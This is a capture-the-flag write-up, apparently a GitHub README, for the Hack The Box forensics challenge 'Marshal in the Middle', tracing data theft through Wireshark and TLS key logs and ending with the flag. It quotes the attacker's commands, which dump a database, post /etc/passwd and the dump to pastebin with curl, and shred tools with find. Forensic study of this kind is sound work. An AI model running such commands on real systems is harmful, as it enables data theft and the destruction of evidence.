Skip to content

Latest commit

 

History

History
109 lines (60 loc) · 3.47 KB

README.md

File metadata and controls

109 lines (60 loc) · 3.47 KB
Raw

Marshal in the Middle

Write-up author: jon-brandy

DESCRIPTION:

The security team was alerted to suspicous network activity from a production web server. Can you determine if any data was stolen and what it was?

HINT:

  • NONE

STEPS:

  1. First, unzip the .zip file given.

RESULT

image

  1. Open the .pcap file in wireshark.

image

  1. Now let's follow the tcp stream.
  2. When i followed the 2nd tcp stream. Got a clue here.

image

image

image

  1. Based from it we know that the attacker checked connectivity to a database server, then used a script named exfildb.sh to dump the remote database.
./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump
  1. Then the attacker tried to upload the contents of etc/passwd to pastebin.com using curl.
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
  1. Seems like the attacker tried to upload contents of etc/passwd again.

image

  1. Next, the attacker used head to check the first four lines of the dumpdb file.

image

  1. Then he used curl again to upload the database of pastebin.com.

image

pastetext=$(cat dumpdb) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
  1. After that, the attacker tried to remove all the tools and dumped database from tmp/.h4x directory.

image

find /tmp/.h4x -type f -exec shred -vfun2  {} \;
  1. The next thing to do is to check what was uploaded to pastebin.com.
  2. First, we need to upload the secrets.log file we got from extracting the zip file as the TLS (Pre)-Master-Secret log filename, because we want to decrypt the encrypted HTTPS traffic.

STEPS

Go to edit -> preferences -> protocols -> TLS -> upload.
  1. Now let's filter the http stream which has pastebin.com as the host.

COMMAND

http.host=="pastebin.com"

RESULT

image

  1. After follow the 1st and the 2nd HTTP stream, i got nothing useful.
  2. But when i followed the 3rd one, i got the flag!

image

FLAG

HTB{Th15_15_4_F3nD3r_Rh0d35_M0m3NT!!}